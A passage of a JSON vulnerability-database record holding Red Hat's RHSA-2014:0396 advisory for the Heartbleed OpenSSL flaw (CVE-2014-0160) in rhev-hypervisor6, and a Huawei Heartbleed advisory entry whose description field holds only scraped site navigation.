"bulletinFamily": "unix", "cvelist": ["CVE-2014-0160"], "description": "The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes\neverything necessary to run and manage virtual machines: a subset of the\nRed Hat Enterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nImportant: This update is an emergency security fix being provided outside\nthe scope of the published support policy for Red Hat Enterprise\nVirtualization listed in the References section. In accordance with the\nsupport policy for Red Hat Enterprise Virtualization, Red Hat Enterprise\nVirtualization Hypervisor 3.2 will not receive future security updates.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which corrects this issue.\n", "modified": "2018-06-07T08:59:36", "published": "2014-04-10T04:00:00", "id": "RHSA-2014:0396", "href": "https://access.redhat.com/errata/RHSA-2014:0396", "type": "redhat", "title": "(RHSA-2014:0396) Important: rhev-hypervisor6 security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "huawei": [{"lastseen": "2019-02-01T18:02:35", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "Products\n\nSwitches\nRouters\nWLAN\nServers\nSee All\n\n\n\nSolutions\n\nCloud Data Center\nEnterprise Networking\nWireless Private Network\nSolutions by Industry\nSee All\n\n\n\nServices\n\nTraining and Certification\nICT Lifecycle Services\nTechnology Services\nIndustry Solution Services\nSee All\n\n\n\nSee all offerings at e.huawei.com\n\n\n\nNeed Support ?\n\nProduct Support\nSoftware Download\nCommunity\nTools\n\nGo to Full Support", "edition": 1, "modified": "2015-03-11T00:00:00", "published": "2014-04-17T00:00:00", "id": "HUAWEI-SA-20140417-HEARTBLEED", "href": "https://www.huawei.com/en/psirt/security-advisories/2015/hw-332187", "title": "Security Advisory-OpenSSL Heartbeat Extension vulnerability (Heartbleed bug) on Huawei multiple products", "type": "huawei", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}]}
